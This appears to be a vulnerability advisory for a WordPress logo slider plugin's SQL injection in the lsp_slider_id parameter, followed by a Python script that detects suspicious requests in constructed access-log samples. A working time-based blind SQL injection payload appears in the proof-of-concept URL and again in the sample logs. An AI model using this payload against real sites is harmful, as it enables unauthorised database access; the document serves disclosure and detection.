EPSS Percentile: 21.8%
The plugin does not sanitise and escape the lsp_slider_id parameter before using it in a SQL statement via the Manage Slider Images admin page, leading to a SQL injection.
https://example.com/wp-admin/admin.php?page=manage_images&lsp_slider_id=1+AND+(SELECT+7741+FROM+(SELECT(SLEEP(5)))hlAf)
bulletin.iese.de/post/logo-slider_1-4-8
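
A detection check for the request shape described above, added here as an example and not taken from the plugin or the advisory: it flags access-log requests to the manage_images admin page whose lsp_slider_id is not a plain integer. The log lines are constructed samples, and the function name, the combined log format and the assumption that legitimate slider IDs are always numeric are choices made for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /wp-admin/admin.php?page=manage_images&lsp_slider_id=1 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:00:07 +0000] "GET /wp-admin/admin.php?page=manage_images&lsp_slider_id=1+AND+(SELECT+7741+FROM+(SELECT(SLEEP(5)))hlAf) HTTP/1.1" 200 5120',
    '203.0.113.5 - - [01/Jan/2024:10:01:00 +0000] "GET /wp-admin/admin.php?page=other_page&lsp_slider_id=abc HTTP/1.1" 200 811',
    '203.0.113.7 - - [01/Jan/2024:10:02:00 +0000] "GET /wp-admin/admin.php?page=manage_images&lsp_slider_id=1%27 HTTP/1.1" 200 5120',
]

# Pulls the request target out of the quoted request line.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def suspicious_slider_requests(lines):
    """Return (line_index, decoded_value) for every request to the
    Manage Slider Images page whose lsp_slider_id is not purely numeric."""
    hits = []
    for index, line in enumerate(lines):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.endswith("/wp-admin/admin.php"):
            continue
        # parse_qs URL-decodes values, so "+" and "%27" are normalised
        # before the check and encoding tricks do not hide the value.
        params = parse_qs(url.query, keep_blank_values=True)
        if params.get("page") != ["manage_images"]:
            continue
        for value in params.get("lsp_slider_id", []):
            # Assumption: a legitimate slider ID is always a plain integer.
            if not re.fullmatch(r"\d+", value):
                hits.append((index, value))
    return hits


if __name__ == "__main__":
    for index, value in suspicious_slider_requests(SAMPLE_LOG):
        print(f"line {index}: lsp_slider_id={value!r}")
```

Access logs normally record only the query string, so a request that carries the parameter in a POST body would need the same check applied at a WAF or in application logging.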